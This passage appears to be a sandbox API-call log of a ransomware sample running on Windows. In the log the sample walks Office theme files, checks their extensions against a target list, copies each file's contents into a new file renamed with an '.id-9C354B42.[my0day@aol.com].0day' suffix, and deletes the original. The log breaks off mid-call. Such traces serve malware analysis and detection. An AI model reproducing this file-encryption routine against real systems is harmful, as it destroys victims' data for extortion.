[0272.589] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.589] lstrlenW (lpString=".7z") returned 3 [0272.589] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.589] lstrlenW (lpString=".dbf") returned 4 [0272.589] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.589] lstrlenW (lpString=".1cd") returned 4 [0272.589] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.589] lstrlenW (lpString=".jpg") returned 4 [0272.590] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.590] lstrlenW (lpString=".doc") returned 4 [0272.590] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString=".docx") returned 5 [0272.590] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.590] lstrlenW (lpString=".pdf") returned 4 [0272.590] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString=".xls") returned 4 [0272.590] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString=".xlsx") returned 5 [0272.590] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.590] lstrlenW (lpString=".ppt") returned 4 [0272.590] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.590] lstrlenW (lpString=".zip") returned 4 [0272.590] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString=".rar") returned 4 [0272.590] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString=".bz2") returned 4 [0272.590] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString=".7z") returned 3 [0272.590] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.590] lstrlenW (lpString=".dbf") returned 4 [0272.590] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.590] lstrlenW (lpString=".1cd") returned 4 [0272.590] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.590] lstrlenW (lpString=".jpg") returned 4 [0272.590] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.591] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.591] lstrlenW (lpString="Couture.eftx") returned 12 [0272.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.596] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=1967905) returned 1 [0272.596] CloseHandle (hObject=0x380) returned 1 [0272.596] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx")) returned 0x20 [0272.606] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.606] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0272.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.606] lstrlenW (lpString=".doc") returned 4 [0272.606] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.606] lstrlenW (lpString=".docx") returned 5 [0272.606] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.606] lstrlenW (lpString=".pdf") returned 4 [0272.606] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.606] lstrlenW (lpString=".xls") returned 4 [0272.606] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.606] lstrlenW (lpString=".xlsx") returned 5 [0272.606] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.606] lstrlenW (lpString=".ppt") returned 4 [0272.606] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.607] lstrlenW (lpString=".zip") returned 4 [0272.607] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString=".rar") returned 4 [0272.607] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString=".bz2") returned 4 [0272.607] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString=".7z") returned 3 [0272.607] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.607] lstrlenW (lpString=".dbf") returned 4 [0272.607] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.607] lstrlenW (lpString=".1cd") returned 4 [0272.607] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.607] lstrlenW (lpString=".jpg") returned 4 [0272.607] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.607] lstrlenW (lpString=".doc") returned 4 [0272.607] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString=".docx") returned 5 [0272.607] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.607] lstrlenW (lpString=".pdf") returned 4 [0272.607] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString=".xls") returned 4 [0272.607] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString=".xlsx") returned 5 [0272.607] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.607] lstrlenW (lpString=".ppt") returned 4 [0272.607] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.607] lstrlenW (lpString=".zip") returned 4 [0272.608] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.608] lstrlenW (lpString=".rar") returned 4 [0272.608] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.608] lstrlenW (lpString=".bz2") returned 4 [0272.608] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.608] lstrlenW (lpString=".7z") returned 3 [0272.608] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.608] lstrlenW (lpString=".dbf") returned 4 [0272.608] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.608] lstrlenW (lpString=".1cd") returned 4 [0272.608] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0272.608] lstrlenW (lpString=".jpg") returned 4 [0272.608] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.608] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.608] lstrlenW (lpString="Elemental.eftx") returned 14 [0272.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0272.618] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=314017) returned 1 [0272.618] CloseHandle (hObject=0x378) returned 1 [0272.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx")) returned 0x20 [0272.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0272.619] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.619] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0272.620] GetLastError () returned 0x0 [0272.620] ReadFile (in: hFile=0x378, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x4caa1, lpOverlapped=0x0) returned 1 [0272.628] WriteFile (in: hFile=0x3a0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x4cab0, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x4cab0, lpOverlapped=0x0) returned 1 [0272.772] ReadFile (in: hFile=0x378, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.772] WriteFile (in: hFile=0x3a0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0272.772] SetEndOfFile (hFile=0x3a0) returned 1 [0272.772] CloseHandle (hObject=0x3a0) returned 1 [0272.772] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.772] SetEndOfFile (hFile=0x378) returned 1 [0272.783] CloseHandle (hObject=0x378) returned 1 [0272.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.784] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx")) returned 1 [0272.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.784] lstrlenW (lpString=".doc") returned 4 [0272.784] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.784] lstrlenW (lpString=".docx") returned 5 [0272.784] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.784] lstrlenW (lpString=".pdf") returned 4 [0272.784] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.784] lstrlenW (lpString=".xls") returned 4 [0272.784] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.784] lstrlenW (lpString=".xlsx") returned 5 [0272.784] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.785] lstrlenW (lpString=".ppt") returned 4 [0272.785] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.785] lstrlenW (lpString=".zip") returned 4 [0272.785] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.785] lstrlenW (lpString=".rar") returned 4 [0272.785] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.785] lstrlenW (lpString=".bz2") returned 4 [0272.785] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.785] lstrlenW (lpString=".7z") returned 3 [0272.785] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.785] lstrlenW (lpString=".dbf") returned 4 [0272.785] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.785] lstrlenW (lpString=".1cd") returned 4 [0272.785] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.785] lstrlenW (lpString=".jpg") returned 4 [0272.785] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.785] lstrlenW (lpString=".doc") returned 4 [0272.785] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.785] lstrlenW (lpString=".docx") returned 5 [0272.785] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.785] lstrlenW (lpString=".pdf") returned 4 [0272.785] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.785] lstrlenW (lpString=".xls") returned 4 [0272.786] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.786] lstrlenW (lpString=".xlsx") returned 5 [0272.786] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.786] lstrlenW (lpString=".ppt") returned 4 [0272.786] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.786] lstrlenW (lpString=".zip") returned 4 [0272.786] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.786] lstrlenW (lpString=".rar") returned 4 [0272.786] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.786] lstrlenW (lpString=".bz2") returned 4 [0272.786] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.786] lstrlenW (lpString=".7z") returned 3 [0272.786] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.786] lstrlenW (lpString=".dbf") returned 4 [0272.786] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.786] lstrlenW (lpString=".1cd") returned 4 [0272.786] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0272.786] lstrlenW (lpString=".jpg") returned 4 [0272.786] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.786] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.786] lstrlenW (lpString="Executive.eftx") returned 14 [0272.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.906] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=21156) returned 1 [0272.906] CloseHandle (hObject=0x39c) returned 1 [0272.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx")) returned 0x20 [0272.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.906] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.906] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0272.907] GetLastError () returned 0x0 [0272.907] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x52a4, lpOverlapped=0x0) returned 1 [0272.919] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x52b0, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x52b0, lpOverlapped=0x0) returned 1 [0272.921] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.921] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0272.921] SetEndOfFile (hFile=0x384) returned 1 [0272.921] CloseHandle (hObject=0x384) returned 1 [0272.921] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.921] SetEndOfFile (hFile=0x39c) returned 1 [0272.924] CloseHandle (hObject=0x39c) returned 1 [0272.924] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.924] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx")) returned 1 [0272.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.924] lstrlenW (lpString=".doc") returned 4 [0272.924] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.924] lstrlenW (lpString=".docx") returned 5 [0272.925] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.925] lstrlenW (lpString=".pdf") returned 4 [0272.925] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString=".xls") returned 4 [0272.925] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString=".xlsx") returned 5 [0272.925] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.925] lstrlenW (lpString=".ppt") returned 4 [0272.925] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.925] lstrlenW (lpString=".zip") returned 4 [0272.925] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString=".rar") returned 4 [0272.925] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString=".bz2") returned 4 [0272.925] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString=".7z") returned 3 [0272.925] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.925] lstrlenW (lpString=".dbf") returned 4 [0272.925] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.925] lstrlenW (lpString=".1cd") returned 4 [0272.925] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.925] lstrlenW (lpString=".jpg") returned 4 [0272.925] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.925] lstrlenW (lpString=".doc") returned 4 [0272.925] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString=".docx") returned 5 [0272.925] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.925] lstrlenW (lpString=".pdf") returned 4 [0272.925] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.925] lstrlenW (lpString=".xls") returned 4 [0272.926] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.926] lstrlenW (lpString=".xlsx") returned 5 [0272.926] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.926] lstrlenW (lpString=".ppt") returned 4 [0272.926] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.926] lstrlenW (lpString=".zip") returned 4 [0272.926] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.926] lstrlenW (lpString=".rar") returned 4 [0272.926] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.926] lstrlenW (lpString=".bz2") returned 4 [0272.926] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.926] lstrlenW (lpString=".7z") returned 3 [0272.926] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.926] lstrlenW (lpString=".dbf") returned 4 [0272.926] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.926] lstrlenW (lpString=".1cd") returned 4 [0272.926] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0272.926] lstrlenW (lpString=".jpg") returned 4 [0272.926] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.926] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.926] lstrlenW (lpString="Horizon.eftx") returned 12 [0272.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 